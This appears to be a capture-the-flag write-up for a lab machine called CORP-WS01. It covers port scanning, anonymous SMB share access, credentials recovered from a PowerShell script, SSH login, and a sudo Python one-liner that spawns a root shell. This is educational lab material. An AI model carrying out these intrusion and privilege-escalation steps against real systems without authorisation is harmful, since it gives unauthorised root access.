CORP-WS01

Reconnaissance

I began by identifying the exposed services.

nmap -sV -p 30122,30180,30545

Results:

SSH (OpenSSH)
HTTP (Apache)
SMB (Samba)

Since SMB was exposed, I focused on enumerating available shares.

SMB Enumeration

Anonymous access was allowed.

smbclient -L // -p 30545 -N

Discovered shares:

SHARE
IT
SHARE

The first share contained only a README file with general environment information about the workstation and domain.

IT Share

The IT share contained:

setup_db.ps1
README.txt

I downloaded the PowerShell script:

smbclient ///IT -p 30545 -N
get setup_db.ps1

Inspecting the script revealed hardcoded service account credentials.

The script also contained a comment indicating the credentials were intended to be removed before deployment, highlighting a common operational security mistake.

Initial Access

Using the recovered credentials, I authenticated to the SSH service.

ssh -p 30122 @

This provided a shell on the target workstation.

Privilege Enumeration

After gaining access, I enumerated sudo permissions.

sudo -l

The output revealed that the current user could execute Python as root without providing a password.

This represented a direct privilege escalation path.

Privilege Escalation

Because Python can execute operating system commands, I used it to spawn a root shell.

sudo python3 -c 'import os; os.system("/bin/bash")'

The shell was launched with root privileges.

Verification:

whoami

Output:

root
Flag Discovery

Once root access was obtained, I searched the filesystem for user and root proof files.

Examples:

find / -name "flag" 2>/dev/null

and

find / -name "user.txt" 2>/dev/null

This led to the user proof file within another user's home directory and the root proof file within the root user's directory.